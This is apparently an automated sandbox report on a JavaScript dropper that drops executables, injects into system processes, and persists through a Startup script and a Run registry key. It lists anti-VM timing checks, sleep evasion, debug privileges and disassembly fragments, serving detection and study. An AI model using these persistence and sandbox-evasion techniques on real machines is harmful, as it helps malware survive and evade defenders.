Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000003.00000003.451270316.0000000000BE1000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000003.448147583.0000000000A4C000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.577803600.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000003.00000002.578046255.0000000000E9F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000D.00000002.991201290.0000000004330000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.579500120.0000000000D4E000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.991328782.000000000444F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.577535038.0000000000BAF000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, oxx7nkdv4g8.exe, 00000017.00000002.891799619.0000000001030000.00000040.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.890212003.0000000000E92000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000003.888712665.0000000000BD9000.00000004.00000800.00020000.00000000.sdmp, oxx7nkdv4g8.exe, 00000017.00000002.892187528.000000000114F000.00000040.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0001C928 push cs; retf 3_2_0001C935
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0001492D push eax; ret 3_2_0001492E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_000272B3 push eax; retf 3_2_000272B4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002EB3B push dword ptr [7D52CE57h]; ret 3_2_0002EB5E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D625 push eax; ret 3_2_0002D678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D672 push eax; ret 3_2_0002D678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D67B push eax; ret 3_2_0002D6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_0002D6DC push eax; ret 3_2_0002D6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DFD0D1 push ecx; ret 3_2_00DFD0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043AD0D1 push ecx; ret 13_2_043AD0E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0040C928 push cs; retf 13_2_0040C935
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0040492D push eax; ret 13_2_0040492E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_004172B3 push eax; retf 13_2_004172B4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041EB3B push dword ptr [7D52CE57h]; ret 13_2_0041EB5E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D672 push eax; ret 13_2_0041D678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D67B push eax; ret 13_2_0041D6E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D625 push eax; ret 13_2_0041D678
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0041D6DC push eax; ret 13_2_0041D6E2
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008D492D push eax; ret 23_2_008D492E
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008DC928 push cs; retf 23_2_008DC935
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008E72B3 push eax; retf 23_2_008E72B4
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008EEB3B push dword ptr [7D52CE57h]; ret 23_2_008EEB5E
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED6DC push eax; ret 23_2_008ED6E2
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED625 push eax; ret 23_2_008ED678
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED67B push eax; ret 23_2_008ED6E2
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_008ED672 push eax; ret 23_2_008ED678
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Code function: 23_2_010AD0D1 push ecx; ret 23_2_010AD0E4
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Source: CIQ-PO16266.js String : entropy: 5.56, length: 330788, content: 'dHJ5ewp2YXIgbG9uZ1RleHQxID0gImRtOXBaQ0FvSVVGeWNtRjVMbkJ5YjNSdmRIbHdaUzVtYjNKRllXTm9JRDhnUVhKeVlYa3V Go to definition
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Source: initial sample Static PE information: section name: .text entropy: 7.27935568792
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Clf0t8l5h\oxx7nkdv4g8.exe Jump to dropped file

Boot Survival
barindex
Drops script or batch files to the startup folder
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtheeNaAZG.js Jump to dropped file
Stores files to the Windows start menu directory
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtheeNaAZG.js Jump to behavior
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtheeNaAZG.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 204UO0JKWK Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 0000000000018C04 second address: 0000000000018C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\bin.exe RDTSC instruction interceptor: First address: 0000000000018F9E second address: 0000000000018FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe RDTSC instruction interceptor: First address: 00000000008D8C04 second address: 00000000008D8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe RDTSC instruction interceptor: First address: 00000000008D8F9E second address: 00000000008D8FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5228 Thread sleep time: -65000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00018ED0 rdtsc 3_2_00018ED0
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe API coverage: 2.4 %
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00411660 FindFirstFileW,FindNextFileW,FindClose, 13_2_00411660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00411659 FindFirstFileW,FindNextFileW,FindClose, 13_2_00411659
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: explorer.exe, 00000004.00000000.509787707.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: wscript.exe, 00000002.00000003.703744618.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.896475063.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.978866316.0000015597A7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWr-0000
Source: explorer.exe, 00000004.00000000.510215126.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.509787707.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: wscript.exe, 00000002.00000003.896380234.0000015597A27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.961961202.0000015597A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703640260.0000015597A27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: explorer.exe, 00000004.00000000.531590842.0000000006900000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000009.00000003.798380808.000002A0FE306000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.972932842.000002A0FE300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: wscript.exe, 00000002.00000003.703744618.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.896475063.0000015597A7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.978866316.0000015597A7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999832531.000002CA05741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921693056.000002CA05741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755502023.000002CA05747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755213500.000002CA05741000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920713114.000002CA05747000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773959377.0000019175C0F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.510215126.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: wscript.exe, 00000007.00000003.773742708.0000019175BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWduia.ro$$
Source: explorer.exe, 00000004.00000000.510215126.0000000008044000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: >C:\Users\user\AppData\Roaming_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
Source: explorer.exe, 00000004.00000000.509787707.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00018ED0 rdtsc 3_2_00018ED0
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\bin.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\Clf0t8l5h\oxx7nkdv4g8.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00E3B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00E3B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00E3B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00E3B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00E3B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3B8D0 mov eax, dword ptr fs:[00000030h] 3_2_00E3B8D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA58EC mov eax, dword ptr fs:[00000030h] 3_2_00DA58EC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9080 mov eax, dword ptr fs:[00000030h] 3_2_00DA9080
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDF0BF mov ecx, dword ptr fs:[00000030h] 3_2_00DDF0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDF0BF mov eax, dword ptr fs:[00000030h] 3_2_00DDF0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDF0BF mov eax, dword ptr fs:[00000030h] 3_2_00DDF0BF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E23884 mov eax, dword ptr fs:[00000030h] 3_2_00E23884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E23884 mov eax, dword ptr fs:[00000030h] 3_2_00E23884
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE90AF mov eax, dword ptr fs:[00000030h] 3_2_00DE90AF
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD20A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD20A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD20A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD20A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD20A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD20A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC0050 mov eax, dword ptr fs:[00000030h] 3_2_00DC0050
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC0050 mov eax, dword ptr fs:[00000030h] 3_2_00DC0050
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E71074 mov eax, dword ptr fs:[00000030h] 3_2_00E71074
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E62073 mov eax, dword ptr fs:[00000030h] 3_2_00E62073
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD002D mov eax, dword ptr fs:[00000030h] 3_2_00DD002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD002D mov eax, dword ptr fs:[00000030h] 3_2_00DD002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD002D mov eax, dword ptr fs:[00000030h] 3_2_00DD002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD002D mov eax, dword ptr fs:[00000030h] 3_2_00DD002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD002D mov eax, dword ptr fs:[00000030h] 3_2_00DD002D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBB02A mov eax, dword ptr fs:[00000030h] 3_2_00DBB02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBB02A mov eax, dword ptr fs:[00000030h] 3_2_00DBB02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBB02A mov eax, dword ptr fs:[00000030h] 3_2_00DBB02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBB02A mov eax, dword ptr fs:[00000030h] 3_2_00DBB02A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E74015 mov eax, dword ptr fs:[00000030h] 3_2_00E74015
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E74015 mov eax, dword ptr fs:[00000030h] 3_2_00E74015
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E27016 mov eax, dword ptr fs:[00000030h] 3_2_00E27016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E27016 mov eax, dword ptr fs:[00000030h] 3_2_00E27016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E27016 mov eax, dword ptr fs:[00000030h] 3_2_00E27016
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E341E8 mov eax, dword ptr fs:[00000030h] 3_2_00E341E8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00DAB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00DAB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00DAB1E1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E269A6 mov eax, dword ptr fs:[00000030h] 3_2_00E269A6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD2990 mov eax, dword ptr fs:[00000030h] 3_2_00DD2990
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDA185 mov eax, dword ptr fs:[00000030h] 3_2_00DDA185
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E251BE mov eax, dword ptr fs:[00000030h] 3_2_00E251BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E251BE mov eax, dword ptr fs:[00000030h] 3_2_00E251BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E251BE mov eax, dword ptr fs:[00000030h] 3_2_00E251BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E251BE mov eax, dword ptr fs:[00000030h] 3_2_00E251BE
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DCC182 mov eax, dword ptr fs:[00000030h] 3_2_00DCC182
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD61A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD61A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD61A0 mov eax, dword ptr fs:[00000030h] 3_2_00DD61A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DCB944 mov eax, dword ptr fs:[00000030h] 3_2_00DCB944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DCB944 mov eax, dword ptr fs:[00000030h] 3_2_00DCB944
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAB171 mov eax, dword ptr fs:[00000030h] 3_2_00DAB171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAB171 mov eax, dword ptr fs:[00000030h] 3_2_00DAB171
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAC962 mov eax, dword ptr fs:[00000030h] 3_2_00DAC962
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9100 mov eax, dword ptr fs:[00000030h] 3_2_00DA9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9100 mov eax, dword ptr fs:[00000030h] 3_2_00DA9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9100 mov eax, dword ptr fs:[00000030h] 3_2_00DA9100
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD513A mov eax, dword ptr fs:[00000030h] 3_2_00DD513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD513A mov eax, dword ptr fs:[00000030h] 3_2_00DD513A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC4120 mov eax, dword ptr fs:[00000030h] 3_2_00DC4120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC4120 mov eax, dword ptr fs:[00000030h] 3_2_00DC4120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC4120 mov eax, dword ptr fs:[00000030h] 3_2_00DC4120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC4120 mov eax, dword ptr fs:[00000030h] 3_2_00DC4120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC4120 mov ecx, dword ptr fs:[00000030h] 3_2_00DC4120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD2ACB mov eax, dword ptr fs:[00000030h] 3_2_00DD2ACB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD2AE4 mov eax, dword ptr fs:[00000030h] 3_2_00DD2AE4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDD294 mov eax, dword ptr fs:[00000030h] 3_2_00DDD294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDD294 mov eax, dword ptr fs:[00000030h] 3_2_00DDD294
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00DBAAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00DBAAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDFAB0 mov eax, dword ptr fs:[00000030h] 3_2_00DDFAB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00DA52A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00DA52A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00DA52A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00DA52A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00DA52A5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E5B260 mov eax, dword ptr fs:[00000030h] 3_2_00E5B260
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E5B260 mov eax, dword ptr fs:[00000030h] 3_2_00E5B260
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E78A62 mov eax, dword ptr fs:[00000030h] 3_2_00E78A62
